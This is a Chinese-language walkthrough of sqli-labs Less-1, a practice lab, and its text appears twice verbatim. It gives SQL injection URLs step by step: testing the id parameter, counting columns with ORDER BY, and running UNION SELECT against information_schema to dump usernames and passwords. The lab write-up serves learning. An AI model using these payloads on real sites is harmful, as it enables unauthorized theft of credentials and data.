sqli-labs less-1()

为了拿到完整的用户和密码

0x01 判断注入点

Payload:

数字型注入没有变化

–起着注释的作用,将后面的语句注释掉,+ 则代表空格

http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' and 1= 1--+ 正常
http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' and 1= 2--+ 报错

故id参数存在注入点

0x02 判断字段数

http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' order by 3 --+  
http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' order by 4 --+Unknown column '4' in 'order clause' 

故得知一共有3个字段

0x03 联合注入查询

http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,3--+

得知数据库名字为security ->查表

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id= -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

emails,referers,uagents,users

查表字段

http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" --+
http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,group_concat(username,0x2b,password) from users --+

0x2b是+的十六进制->便于区分账户和密码

————————

为了拿到完整的用户和密码

0x01 判断注入点

Payload:

数字型注入没有变化

–起着注释的作用,将后面的语句注释掉,+ 则代表空格

http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' and 1= 1--+ 正常
http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' and 1= 2--+ 报错

故id参数存在注入点

0x02 判断字段数

http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' order by 3 --+  
http://127.0.0.1/sqli-labs-master/Less-1/?id= 1' order by 4 --+Unknown column '4' in 'order clause' 

故得知一共有3个字段

0x03 联合注入查询

http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,3--+

得知数据库名字为security ->查表

http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id= -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" --+

emails,referers,uagents,users

查表字段

http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" --+
http://127.0.0.1/sqli-labs-master/Less-1/?id= -1' union select 1,2,group_concat(username,0x2b,password) from users --+

0x2b是+的十六进制->便于区分账户和密码